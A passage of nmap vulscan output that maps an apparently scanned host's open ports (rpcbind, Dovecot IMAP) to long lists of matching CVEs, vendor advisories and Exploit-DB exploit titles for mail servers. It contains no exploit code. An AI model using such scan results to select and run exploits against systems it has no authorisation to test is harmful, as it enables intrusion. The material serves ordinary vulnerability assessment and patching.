13009| [55296] DirectAdmin CMD_REDIRECT URL Parameter XSS
13010| [54015] DirectAdmin CMD_DB name Parameter Shell Metacharacter Arbitrary Command Execution
13011| [54014] DirectAdmin CMD_DB Database Backup Request Temporary File Symlink Arbitrary File Overwrite
13012| [50253] Dovecot dovecot.conf Permission Weakness Local ssl_key_password Parameter Disclosure
13013| [49918] Dovecot ManageSieve Script Name Handling Traversal Arbitrary File Manipulation
13014| [49429] Dovecot Message Parsing Feature Crafted Email Header Handling Remote DoS
13015| [49099] Dovecot ACL Plugin k Right Mailbox Creation Restriction Bypass
13016| [49098] Dovecot ACL Plugin Negative Access Rights Bypass
13017| [43137] Dovecot mail_extra_groups Symlink File Manipulation
13018| [42979] Dovecot passdbs Argument Injection Authentication Bypass
13019| [39876] Dovecot LDAP Auth Cache Security Bypass
13020| [39386] Dovecot ACL Plugin Insert Right APPEND / COPY Command Unauthorized Flag Manipulation
13021| [36999] DirectAdmin CMD_BANDWIDTH_BREAKDOWN user Parameter XSS
13022| [36339] DirectAdmin CMD_USER_STATS domain Parameter XSS
13023| [35489] Dovecot index/mbox/mbox-storage.c Traversal Arbitrary Gzip File Access
13024| [34687] DirectAdmin http/ftp XSS Log Viewer Data Injection
13025| [34273] DirectAdmin CMD_USER_STATS RESULT Parameter XSS
13026| [32676] DirectAdmin CMD_FTP_SHOW DOMAIN Parameter XSS
13027| [32675] DirectAdmin CMD_EMAIL_LIST name Parameter XSS
13028| [32674] DirectAdmin CMD_EMAIL_VACATION_MODIFY user Parameter XSS
13029| [32673] DirectAdmin CMD_TICKET type Parameter XSS
13030| [32672] DirectAdmin CMD_EMAIL_FORWARDER_MODIFY user Parameter XSS
13031| [32671] DirectAdmin CMD_TICKET_CREATE TYPE Parameter XSS
13032| [32670] DirectAdmin CMD_SHOW_USER user Parameter XSS
13033| [32669] DirectAdmin CMD_SHOW_RESELLER user Parameter XSS
13034| [30524] Dovecot IMAP/POP3 Server dovecot.index.cache Handling Overflow
13035| [25853] Cyrus IMAPD pop3d USER Command Remote Overflow
13036| [25727] Dovecot Multiple Command Traversal Arbitrary Directory Listing
13037| [25138] DirectAdmin HTM_PASSWD domain Parameter XSS
13038| [23281] Dovecot imap/pop3-login dovecot-auth DoS
13039| [23280] Dovecot Malformed APPEND Command DoS
13040| [14459] mmmail mmpop3d USER Command mmsyslog Function Format String
13041| [12033] Slackware Linux imapd/ipop3d Malformed USER/PASS Sequence DoS
13042| [5857] Linux pop3d Arbitrary Mail File Access
13043| [2471] akpop3d username SQL Injection
13044|_
13045111/tcp open rpcbind 2-4 (RPC #100000)
13046| rpcinfo:
13047| program version port/proto service
13048| 100000 2,3,4 111/tcp rpcbind
13049| 100000 2,3,4 111/udp rpcbind
13050| 100000 3,4 111/tcp6 rpcbind
13051| 100000 3,4 111/udp6 rpcbind
13052| 100024 1 35598/tcp status
13053| 100024 1 43746/tcp6 status
13054| 100024 1 48690/udp6 status
13055|_ 100024 1 56252/udp status
13056139/tcp filtered netbios-ssn
13057143/tcp open imap Dovecot imapd
13058| vulscan: VulDB - https://vuldb.com:
13059| [139289] cPanel up to 68.0.14 dovecot-xaps-plugin Format privilege escalation
13060| [134480] Dovecot up to 2.3.5.2 Submission-Login Crash denial of service
13061| [134479] Dovecot up to 2.3.5.2 IMAP Server Crash denial of service
13062| [134024] Dovecot up to 2.3.5.1 JSON Encoder Username Crash denial of service
13063| [132543] Dovecot up to 2.2.36.0/2.3.4.0 Certificate Impersonation weak authentication
13064| [119762] Dovecot up to 2.2.28 dict Authentication var_expand() denial of service
13065| [114012] Dovecot up to 2.2.33 TLS SNI Restart denial of service
13066| [114009] Dovecot SMTP Delivery Email Message Out-of-Bounds memory corruption
13067| [112447] Dovecot up to 2.2.33/2.3.0 SASL Auth Memory Leak denial of service
13068| [106837] Dovecot up to 2.2.16 ssl-proxy-openssl.c ssl-proxy-opensslc denial of service
13069| [97052] Dovecot up to 2.2.26 auth-policy Unset Crash denial of service
13070| [69835] Dovecot 2.2.0/2.2.1 denial of service
13071| [13348] Dovecot up to 1.2.15/2.1.15 IMAP4/POP3 SSL/TLS Handshake denial of service
13072| [65684] Dovecot up to 2.2.6 unknown vulnerability
13073| [9807] Dovecot up to 1.2.7 on Exim Input Sanitizer privilege escalation
13074| [63692] Dovecot up to 2.0.15 spoofing
13075| [7062] Dovecot 2.1.10 mail-search.c denial of service
13076| [59792] Cyrus IMAPd 2.4.11 weak authentication
13077| [57517] Dovecot up to 2.0.12 Login directory traversal
13078| [57516] Dovecot up to 2.0.12 Access Restriction directory traversal
13079| [57515] Dovecot up to 2.0.12 Crash denial of service
13080| [54944] Dovecot up to 1.2.14 denial of service
13081| [54943] Dovecot up to 1.2.14 Access Restriction Symlink privilege escalation
13082| [54942] Dovecot up to 2.0.4 Access Restriction denial of service
13083| [54941] Dovecot up to 2.0.4 Access Restriction unknown vulnerability
13084| [54840] Dovecot up to 1.2.12 AGate unknown vulnerability
13085| [53277] Dovecot up to 1.2.10 denial of service
13086| [50082] Dovecot up to 1.1.6 Stack-based memory corruption
13087| [45256] Dovecot up to 1.1.5 directory traversal
13088| [44846] Dovecot 1.1.4/1.1.5 IMAP Client Crash denial of service
13089| [44546] Dovecot up to 1.0.x Access Restriction unknown vulnerability
13090| [44545] Dovecot up to 1.0.x Access Restriction unknown vulnerability
13091| [41430] Dovecot 1.0.12/1.1 Locking unknown vulnerability
13092| [40356] Dovecot 1.0.9 Cache unknown vulnerability
13093| [38222] Dovecot 1.0.2 directory traversal
13094| [37927] Ipswitch Ipswitch Collaboration Suite up to 2006.1 IMAP Service imapd32.exe memory corruption
13095| [36376] Dovecot up to 1.0.x directory traversal
13096| [35759] Atrium MERCUR IMAPD IMAP4 mcrimap4.exe memory corruption
13097| [33332] Timo Sirainen Dovecot up to 1.0test53 Off-By-One memory corruption
13098|
13099| MITRE CVE - https://cve.mitre.org:
13100| [CVE-2009-2632] Buffer overflow in the SIEVE script component (sieve/script.c), as used in cyrus-imapd in Cyrus IMAP Server 2.2.13 and 2.3.14, and Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, allows local users to execute arbitrary code and read or modify arbitrary messages via a crafted SIEVE script, related to the incorrect use of the sizeof operator for determining buffer length, combined with an integer signedness error.
13101| [CVE-2011-4318] Dovecot 2.0.x before 2.0.16, when ssl or starttls is enabled and hostname is used to define the proxy destination, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a valid certificate for a different hostname.
13102| [CVE-2011-3481] The index_get_ids function in index.c in imapd in Cyrus IMAP Server before 2.4.11, when server-side threading is enabled, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a crafted References header in an e-mail message.
13103| [CVE-2011-3372] imap/nntpd.c in the NNTP server (nntpd) for Cyrus IMAPd 2.4.x before 2.4.12 allows remote attackers to bypass authentication by sending an AUTHINFO USER command without sending an additional AUTHINFO PASS command.
13104| [CVE-2011-2167] script-login in Dovecot 2.0.x before 2.0.13 does not follow the chroot configuration setting, which might allow remote authenticated users to conduct directory traversal attacks by leveraging a script.
13105| [CVE-2011-2166] script-login in Dovecot 2.0.x before 2.0.13 does not follow the user and group configuration settings, which might allow remote authenticated users to bypass intended access restrictions by leveraging a script.
13106| [CVE-2011-1929] lib-mail/message-header-parser.c in Dovecot 1.2.x before 1.2.17 and 2.0.x before 2.0.13 does not properly handle '\0' characters in header names, which allows remote attackers to cause a denial of service (daemon crash or mailbox corruption) via a crafted e-mail message.
13107| [CVE-2010-4011] Dovecot in Apple Mac OS X 10.6.5 10H574 does not properly manage memory for user names, which allows remote authenticated users to read the private e-mail of other persons in opportunistic circumstances via standard e-mail clients accessing a user's own mailbox, related to a "memory aliasing issue."
13108| [CVE-2010-3780] Dovecot 1.2.x before 1.2.15 allows remote authenticated users to cause a denial of service (master process outage) by simultaneously disconnecting many (1) IMAP or (2) POP3 sessions.
13109| [CVE-2010-3779] Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.beta2 grants the admin permission to the owner of each mailbox in a non-public namespace, which might allow remote authenticated users to bypass intended access restrictions by changing the ACL of a mailbox, as demonstrated by a symlinked shared mailbox.
13110| [CVE-2010-3707] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving more specific entries that occur after less specific entries, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
13111| [CVE-2010-3706] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving the private namespace of a user, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
13112| [CVE-2010-3304] The ACL plugin in Dovecot 1.2.x before 1.2.13 propagates INBOX ACLs to newly created mailboxes in certain configurations, which might allow remote attackers to read mailboxes that have unintended weak ACLs.
13113| [CVE-2010-0745] Unspecified vulnerability in Dovecot 1.2.x before 1.2.11 allows remote attackers to cause a denial of service (CPU consumption) via long headers in an e-mail message.
13114| [CVE-2010-0535] Dovecot in Apple Mac OS X 10.6 before 10.6.3, when Kerberos is enabled, does not properly enforce the service access control list (SACL) for sending and receiving e-mail, which allows remote authenticated users to bypass intended access restrictions via unspecified vectors.
13115| [CVE-2010-0433] The kssl_keytab_is_available function in ssl/kssl.c in OpenSSL before 0.9.8n, when Kerberos is enabled but Kerberos configuration files cannot be opened, does not check a certain return value, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via SSL cipher negotiation, as demonstrated by a chroot installation of Dovecot or stunnel without Kerberos configuration files inside the chroot.
13116| [CVE-2009-3897] Dovecot 1.2.x before 1.2.8 sets 0777 permissions during creation of certain directories at installation time, which allows local users to access arbitrary user accounts by replacing the auth socket, related to the parent directories of the base_dir directory, and possibly the base_dir directory itself.
13117| [CVE-2009-3235] Multiple stack-based buffer overflows in the Sieve plugin in Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, as derived from Cyrus libsieve, allow context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted SIEVE script, as demonstrated by forwarding an e-mail message to a large number of recipients, a different vulnerability than CVE-2009-2632.
13118| [CVE-2008-5301] Directory traversal vulnerability in the ManageSieve implementation in Dovecot 1.0.15, 1.1, and 1.2 allows remote attackers to read and modify arbitrary .sieve files via a ".." (dot dot) in a script name.
13119| [CVE-2008-4907] The message parsing feature in Dovecot 1.1.4 and 1.1.5, when using the FETCH ENVELOPE command in the IMAP client, allows remote attackers to cause a denial of service (persistent crash) via an email with a malformed From address, which triggers an assertion error, aka "invalid message address parsing bug."
13120| [CVE-2008-4870] dovecot 1.0.7 in Red Hat Enterprise Linux (RHEL) 5, and possibly Fedora, uses world-readable permissions for dovecot.conf, which allows local users to obtain the ssl_key_password parameter value.
13121| [CVE-2008-4578] The ACL plugin in Dovecot before 1.1.4 allows attackers to bypass intended access restrictions by using the "k" right to create unauthorized "parent/child/child" mailboxes.
13122| [CVE-2008-4577] The ACL plugin in Dovecot before 1.1.4 treats negative access rights as if they are positive access rights, which allows attackers to bypass intended access restrictions.
13123| [CVE-2008-1218] Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
13124| [CVE-2008-1199] Dovecot before 1.0.11, when configured to use mail_extra_groups to allow Dovecot to create dotlocks in /var/mail, might allow local users to read sensitive mail files for other users, or modify files or directories that are writable by group, via a symlink attack.
13125| [CVE-2007-6598] Dovecot before 1.0.10, with certain configuration options including use of %variables, does not properly maintain the LDAP+auth cache, which might allow remote authenticated users to login as a different user who has the same password.
13126| [CVE-2007-5794] Race condition in nss_ldap, when used in applications that are linked against the pthread library and fork after a call to nss_ldap, might send user data to the wrong process because of improper handling of the LDAP connection. NOTE: this issue was originally reported for Dovecot with the wrong mailboxes being returned, but other applications might also be affected.
13127| [CVE-2007-5740] The format string protection mechanism in IMAPD for Perdition Mail Retrieval Proxy 1.17 and earlier allows remote attackers to execute arbitrary code via an IMAP tag with a null byte followed by a format string specifier, which is not counted by the mechanism.
13128| [CVE-2007-5018] Stack-based buffer overflow in IMAPD in Mercury/32 4.52 allows remote authenticated users to execute arbitrary code via a long argument in a SEARCH ON command. NOTE: this issue might overlap with CVE-2004-1211.
13129| [CVE-2007-4211] The ACL plugin in Dovecot before 1.0.3 allows remote authenticated users with the insert right to save certain flags via a (1) COPY or (2) APPEND command.
13130| [CVE-2007-3925] Multiple buffer overflows in the IMAP service (imapd32.exe) in Ipswitch IMail Server 2006 before 2006.21 allow remote authenticated users to execute arbitrary code via the (1) Search or (2) Search Charset command.
13131| [CVE-2007-2231] Directory traversal vulnerability in index/mbox/mbox-storage.c in Dovecot before 1.0.rc29, when using the zlib plugin, allows remote attackers to read arbitrary gzipped (.gz) mailboxes (mbox files) via a .. (dot dot) sequence in the mailbox name.
13132| [CVE-2007-2173] Eval injection vulnerability in (1) courier-imapd.indirect and (2) courier-pop3d.indirect in Courier-IMAP before 4.0.6-r2, and 4.1.x before 4.1.2-r1, on Gentoo Linux allows remote attackers to execute arbitrary commands via the XMAILDIR variable, related to the LOGINRUN variable.
13133| [CVE-2007-1579] Stack-based buffer overflow in Atrium MERCUR IMAPD allows remote attackers to have an unknown impact via a certain SUBSCRIBE command.
13134| [CVE-2007-1578] Multiple integer signedness errors in the NTLM implementation in Atrium MERCUR IMAPD (mcrimap4.exe) 5.00.14, with SP4, allow remote attackers to execute arbitrary code via a long NTLMSSP argument that triggers a stack-based buffer overflow.
13135| [CVE-2007-0618] Unspecified vulnerability in (1) pop3d, (2) pop3ds, (3) imapd, and (4) imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."
13136| [CVE-2006-6762] The IMAP daemon (IMAPD) in Novell NetMail before 3.52e FTF2 allows remote authenticated users to cause a denial of service via an APPEND command with a single "(" (parenthesis) in the argument.
13137| [CVE-2006-6761] Stack-based buffer overflow in the IMAP daemon (IMAPD) in Novell NetMail before 3.52e FTF2 allows remote authenticated users to execute arbitrary code via a long argument to the SUBSCRIBE command.
13138| [CVE-2006-6425] Stack-based buffer overflow in the IMAP daemon (IMAPD) in Novell NetMail before 3.52e FTF2 allows remote authenticated users to execute arbitrary code via unspecified vectors involving the APPEND command.
13139| [CVE-2006-6424] Multiple buffer overflows in Novell NetMail before 3.52e FTF2 allow remote attackers to execute arbitrary code (1) by appending literals to certain IMAP verbs when specifying command continuation requests to IMAPD, resulting in a heap overflow
13140| [CVE-2006-5973] Off-by-one buffer overflow in Dovecot 1.0test53 through 1.0.rc14, and possibly other versions, when index files are used and mmap_disable is set to "yes," allows remote authenticated IMAP or POP3 users to cause a denial of service (crash) via unspecified vectors involving the cache file.
13141| [CVE-2006-2502] Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
13142| [CVE-2006-2414] Directory traversal vulnerability in Dovecot 1.0 beta and 1.0 allows remote attackers to list files and directories under the mbox parent directory and obtain mailbox names via ".." sequences in the (1) LIST or (2) DELETE IMAP command.
13143| [CVE-2006-0730] Multiple unspecified vulnerabilities in Dovecot before 1.0beta3 allow remote attackers to cause a denial of service (application crash or hang) via unspecified vectors involving (1) "potential hangs" in the APPEND command and "potential crashes" in (2) dovecot-auth and (3) imap/pop3-login. NOTE: vector 2 might be related to a double free vulnerability.
13144| [CVE-2005-2278] Stack-based buffer overflow in the IMAP daemon (imapd) in MailEnable Professional 1.54 allows remote authenticated users to execute arbitrary code via the status command with a long mailbox name.
13145| [CVE-2005-1256] Stack-based buffer overflow in the IMAP daemon (IMAPD32.EXE) in IMail 8.13 in Ipswitch Collaboration Suite (ICS), and other versions before IMail Server 8.2 Hotfix 2, allows remote authenticated users to execute arbitrary code via a STATUS command with a long mailbox name.
13146| [CVE-2005-1249] The IMAP daemon (IMAPD32.EXE) in Ipswitch Collaboration Suite (ICS) allows remote attackers to cause a denial of service (CPU consumption) via an LSUB command with a large number of null characters, which causes an infinite loop.
13147| [CVE-2005-1015] Buffer overflow in MailEnable Imapd (MEIMAP.exe) allows remote attackers to execute arbitrary code via a long LOGIN command.
13148| [CVE-2005-0546] Multiple buffer overflows in Cyrus IMAPd before 2.2.11 may allow attackers to execute arbitrary code via (1) an off-by-one error in the imapd annotate extension, (2) an off-by-one error in "cached header handling," (3) a stack-based buffer overflow in fetchnews, or (4) a stack-based buffer overflow in imapd.
13149| [CVE-2003-1322] Multiple stack-based buffer overflows in Atrium MERCUR IMAPD in MERCUR Mailserver before 4.2.15.0 allow remote attackers to execute arbitrary code via a long (1) EXAMINE, (2) DELETE, (3) SUBSCRIBE, (4) RENAME, (5) UNSUBSCRIBE, (6) LIST, (7) LSUB, (8) STATUS, (9) LOGIN, (10) CREATE, or (11) SELECT command.
13150| [CVE-2002-1782] The default configuration of University of Washington IMAP daemon (wu-imapd), when running on a system that does not allow shell access, allows a local user with a valid IMAP account to read arbitrary files as that user.
13151| [CVE-2002-1604] Multiple buffer overflows in HP Tru64 UNIX allow local and possibly remote attackers to execute arbitrary code via a long NLSPATH environment variable to (1) csh, (2) dtsession, (3) dxsysinfo, (4) imapd, (5) inc, (6) uucp, (7) uux, (8) rdist, or (9) deliver.
13152| [CVE-2002-0997] Buffer overflows in IMAP Agent (imapd) for Novell NetMail (NIMS) 3.0.3 before 3.0.3A allows remote attackers to cause a denial of service.
13153| [CVE-2002-0379] Buffer overflow in University of Washington imap server (uw-imapd) imap-2001 (imapd 2001.315) and imap-2001a (imapd 2001.315) with legacy RFC 1730 support, and imapd 2000.287 and earlier, allows remote authenticated users to execute arbitrary code via a long BODY request.
13154| [CVE-2001-0691] Buffer overflows in Washington University imapd 2000a through 2000c could allow local users without shell access to execute code as themselves in certain configurations.
13155| [CVE-2000-0284] Buffer overflow in University of Washington imapd version 4.7 allows users with a valid account to execute commands via LIST or other commands.
13156| [CVE-1999-1557] Buffer overflow in the login functions in IMAP server (imapd) in Ipswitch IMail 5.0 and earlier allows remote attackers to cause a denial of service and possibly execute arbitrary code via (1) a long user name or (2) a long password.
13157| [CVE-1999-1445] Vulnerability in imapd and ipop3d in Slackware 3.4 and 3.3 with shadowing enabled, and possibly other operating systems, allows remote attackers to cause a core dump via a short sequence of USER and PASS commands that do not provide valid usernames or passwords.
13158| [CVE-1999-1224] IMAP 4.1 BETA, and possibly other versions, does not properly handle the SIGABRT (abort) signal, which allows local users to crash the server (imapd) via certain sequences of commands, which causes a core dump that may contain sensitive password information.
13159|
13160| SecurityFocus - https://www.securityfocus.com/bid/:
13161| [103201] Dovecot CVE-2017-14461 Out-Of-Bounds Read Information Disclosure Vulnerability
13162| [97536] Dovecot CVE-2017-2669 Denial of Service Vulnerability
13163| [94639] Dovecot Auth Component CVE-2016-8652 Denial of Service Vulnerability
13164| [91175] Dovecot CVE-2016-4982 Local Information Disclosure Vulnerability
13165| [84736] Dovecot CVE-2008-4870 Local Security Vulnerability
13166| [84478] imapd CVE-1999-1224 Denial-Of-Service Vulnerability
13167| [74335] Dovecot 'ssl-proxy-openssl.c' Remote Denial of Service Vulnerability
13168| [67306] Dovecot Denial of Service Vulnerability
13169| [65650] Eudora WorldMail imapd 'UID' Command Buffer Overflow Vulnerability
13170| [63367] Dovecot Checkpassword Authentication Protocol Local Authentication Bypass Vulnerability
13171| [61763] RETIRED: Dovecot 'LIST' Command Denial of Service Vulnerability
13172| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
13173| [60052] Dovecot 'APPEND' Parameter Denial of Service Vulnerability
13174| [56759] RETIRED: Dovecot 'mail-search.c' Denial of Service Vulnerability
13175| [51403] Eudora WorldMail imapd 'LIST' Command Buffer Overflow Vulnerability
13176| [50709] Dovecot SSL Certificate 'Common Name' Field Validation Security Bypass Vulnerability
13177| [49949] Cyrus IMAPd NTTP Logic Error Authentication Bypass Vulnerability
13178| [48003] Dovecot 'script-login' Multiple Security Bypass Vulnerabilities
13179| [47930] Dovecot Header Name NULL Character Denial of Service Vulnerability
13180| [44874] Apple Mac OS X Dovecot (CVE-2010-4011) Memory Corruption Vulnerability
13181| [43690] Dovecot Access Control List (ACL) Multiple Remote Vulnerabilities
13182| [41964] Dovecot Access Control List (ACL) Plugin Security Bypass Weakness
13183| [39258] Dovecot Service Control Access List Security Bypass Vulnerability
13184| [37084] Dovecot Insecure 'base_dir' Permissions Local Privilege Escalation Vulnerability
13185| [36377] Dovecot Sieve Plugin Multiple Unspecified Buffer Overflow Vulnerabilities
13186| [32582] Dovecot ManageSieve Service '.sieve' Files Directory Traversal Vulnerability
13187| [31997] Dovecot Invalid Message Address Parsing Denial of Service Vulnerability
13188| [31587] Dovecot ACL Plugin Multiple Security Bypass Vulnerabilities
13189| [28181] Dovecot 'Tab' Character Password Check Security Bypass Vulnerability
13190| [28092] Dovecot 'mail_extra_groups' Insecure Settings Local Unauthorized Access Vulnerability
13191| [27093] Dovecot Authentication Cache Security Bypass Vulnerability
13192| [26270] Perdition IMAPD __STR_VWRITE Remote Format String Vulnerability
13193| [25733] Mercury/32 IMAPD SEARCH Command Remote Stack Buffer Overflow Vulnerability
13194| [25182] Dovecot ACL Plugin Security Bypass Vulnerability
13195| [23552] Dovecot Zlib Plugin Remote Information Disclosure Vulnerability
13196| [23058] Atrium Mercur IMapD NTLM Buffer Overflow Vulnerability
13197| [22262] IBM AIX Pop3D/Pop3DS/IMapD/IMapDS Authentication Bypass Vulnerability
13198| [21183] Dovecot IMAP Server Mapped Pages Off-By-One Buffer Overflow Vulnerability
13199| [18056] Cyrus IMAPD POP3D Remote Buffer Overflow Vulnerability
13200| [17961] Dovecot Remote Information Disclosure Vulnerability
13201| [16672] Dovecot Double Free Denial of Service Vulnerability
13202| [15980] Qualcomm WorldMail IMAPD Buffer Overflow Vulnerability
13203| [15753] Ipswitch Collaboration Suite and IMail Server IMAPD LIST Command Denial Of Service Vulnerability
13204| [12636] Cyrus IMAPD Multiple Remote Buffer Overflow Vulnerabilities
13205| [11738] Cyrus IMAPD Multiple Remote Unspecified Vulnerabilities
13206| [11729] Cyrus IMAPD Multiple Remote Vulnerabilities
13207| [6298] Cyrus IMAPD Pre-Login Heap Corruption Vulnerability
13208| [4713] Wu-imapd Partial Mailbox Attribute Remote Buffer Overflow Vulnerability
13209| [2856] Imapd 'Local' Buffer Overflow Vulnerabilities
13210| [1110] Univ. Of Washington imapd Buffer Overflow Vulnerabilities
13211| [502] NT IMail Imapd Buffer Overflow DoS Vulnerability
13212| [130] imapd Buffer Overflow Vulnerability
13213|
13214| IBM X-Force - https://exchange.xforce.ibmcloud.com:
13215| [86382] Dovecot POP3 Service denial of service
13216| [84396] Dovecot IMAP APPEND denial of service
13217| [80453] Dovecot mail-search.c denial of service
13218| [71354] Dovecot SSL Common Name (CN) weak security
13219| [70325] Cyrus IMAPd NNTP security bypass
13220| [67675] Dovecot script-login security bypass
13221| [67674] Dovecot script-login directory traversal
13222| [67589] Dovecot header name denial of service
13223| [63267] Apple Mac OS X Dovecot information disclosure
13224| [62340] Dovecot mailbox security bypass
13225| [62339] Dovecot IMAP or POP3 denial of service
13226| [62256] Dovecot mailbox security bypass
13227| [62255] Dovecot ACL entry security bypass
13228| [60639] Dovecot ACL plugin weak security
13229| [57267] Apple Mac OS X Dovecot Kerberos security bypass
13230| [56763] Dovecot header denial of service
13231| [54363] Dovecot base_dir privilege escalation
13232| [53248] CMU Sieve plugin for Dovecot unspecified buffer overflow
13233| [47526] UW-imapd rfc822_output_char() denial of service
13234| [46323] Dovecot dovecot.conf information disclosure
13235| [46227] Dovecot message parsing denial of service
13236| [45669] Dovecot ACL mailbox security bypass
13237| [45667] Dovecot ACL plugin rights security bypass
13238| [41085] Dovecot TAB characters authentication bypass
13239| [41009] Dovecot mail_extra_groups option unauthorized access
13240| [39342] Dovecot LDAP auth cache configuration security bypass
13241| [35767] Dovecot ACL plugin security bypass
13242| [34082] Dovecot mbox-storage.c directory traversal
13243| [30433] Dovecot IMAP/POP3 server dovecot.index.cache buffer overflow
13244| [26536] Dovecot IMAP LIST information disclosure
13245| [24710] Dovecot dovecot-auth and imap/pop3-login denial of service
13246| [24709] Dovecot APPEND command denial of service
13247| [22629] RHSA-2005:408 updates for cyrus-imapd not installed
13248| [19460] Cyrus IMAP imapd buffer overflow
13249| [19455] Cyrus IMAP imapd extension off-by-one buffer overflow
13250| [18492] Novell NetMail IMAPD 101_mEna buffer overflow
13251| [10803] UW IMAP (wu-imapd) authenticated user buffer overflow
13252| [9238] UW IMAP (wu-imapd) could allow a remote attacker to access arbitrary files
13253| [9055] UW IMAP (wu-imapd) partial mailbox attributes to request buffer overflow
13254| [7345] Slackware Linux imapd and ipop3d core dump
13255| [573] Imapd denial of service
13256|
13257| Exploit-DB - https://www.exploit-db.com:
13258| [30724] Perdition 1.17 IMAPD __STR_VWRITE Remote Format String Vulnerability
13259| [25297] Dovecot with Exim sender_address Parameter - Remote Command Execution
13260| [22061] Cyrus IMAPD 1.4/1.5.19/2.0.12/2.0.16/2.1.9/2.1.10 Pre-Login Heap Corruption Vulnerability
13261| [21443] Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (2)
13262| [21442] Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (1)
13263| [19849] UoW imapd 10.234/12.264 COPY Buffer Overflow (meta)
13264| [19848] UoW imapd 10.234/12.264 LSUB Buffer Overflow (meta)
13265| [19847] UoW imapd 10.234/12.264 Buffer Overflow Vulnerabilities
13266| [19377] Ipswitch IMail 5.0 Imapd Buffer Overflow DoS Vulnerability
13267| [19107] Netscape Messaging Server 3.55,University of Washington imapd 10.234 Buffer Overflow Vulnerability
13268| [18354] WorldMail imapd 3.0 SEH overflow (egg hunter)
13269| [16836] Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
13270| [16485] MailEnable IMAPD 1.54 - STATUS Request Buffer Overflow
13271| [16482] MDaemon 9.6.4 IMAPD FETCH Buffer Overflow
13272| [16480] MailEnable IMAPD W3C Logging Buffer Overflow
13273| [16477] Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow
13274| [16475] MailEnable IMAPD (2.35) Login Request Buffer Overflow
13275| [16474] Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow
13276| [5257] Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit
13277| [4429] Mercury/32 4.52 IMAPD SEARCH command Post-Auth Overflow Exploit
13278| [3627] IPSwitch IMail Server <= 8.20 IMAPD Remote Buffer Overflow Exploit
13279| [3527] Mercur IMAPD 5.00.14 Remote Denial of Service Exploit (win32)
13280| [2185] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
13281| [2053] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
13282| [1813] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
13283| [1380] Eudora Qualcomm WorldMail 3.0 (IMAPd) Remote Overflow Exploit
13284| [1332] MailEnable 1.54 Pro Universal IMAPD W3C Logging BoF Exploit
13285| [1327] FTGate4 Groupware Mail Server 4.1 (imapd) Remote Buffer Overflow PoC
13286| [1151] MDaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow Exploit
13287| [1124] IPSwitch IMail Server <= 8.15 IMAPD Remote Root Exploit
13288| [915] MailEnable Enterprise 1.x Imapd Remote Exploit
13289| [903] Cyrus imapd 2.2.4 - 2.2.8 (imapmagicplus) Remote Exploit
13290| [340] Linux imapd Remote Overflow File Retrieve Exploit
13291|
13292| OpenVAS (Nessus) - http://www.openvas.org:
13293| [901026] Dovecot Sieve Plugin Multiple Buffer Overflow Vulnerabilities
13294| [901025] Dovecot Version Detection
13295| [881425] CentOS Update for cyrus-imapd CESA-2011:1508 centos5 x86_64
13296| [881403] CentOS Update for cyrus-imapd CESA-2011:0859 centos5 x86_64
13297| [881402] CentOS Update for dovecot CESA-2011:1187 centos5 x86_64
13298| [881397] CentOS Update for cyrus-imapd CESA-2011:1317 centos4 x86_64
13299| [881370] CentOS Update for cyrus-imapd CESA-2011:1508 centos4 x86_64
13300| [881358] CentOS Update for dovecot CESA-2011:1187 centos4 x86_64
13301| [881318] CentOS Update for cyrus-imapd CESA-2011:0859 centos4 x86_64
13302| [881255] CentOS Update for cyrus-imapd CESA-2011:1317 centos5 x86_64
13303| [881050] CentOS Update for cyrus-imapd CESA-2011:1508 centos5 i386
13304| [881049] CentOS Update for cyrus-imapd CESA-2011:1508 centos4 i386
13305| [881007] CentOS Update for cyrus-imapd CESA-2011:1317 centos5 i386
13306| [880980] CentOS Update for dovecot CESA-2011:1187 centos5 i386
13307| [880978] CentOS Update for cyrus-imapd CESA-2011:1317 centos4 i386
13308| [880967] CentOS Update for dovecot CESA-2011:1187 centos4 i386
13309| [880958] CentOS Update for cyrus-imapd CESA-2011:0859 centos4 i386
13310| [880905] CentOS Update for cyrus-imapd CESA-2009:1459 centos4 i386
13311| [880864] CentOS Update for cyrus-imapd CESA-2009:1459 centos5 i386
13312| [880826] CentOS Update for cyrus-imapd CESA-2009:1116 centos5 i386
13313| [880536] CentOS Update for cyrus-imapd CESA-2011:0859 centos5 i386
13314| [870607] RedHat Update for dovecot RHSA-2011:0600-01
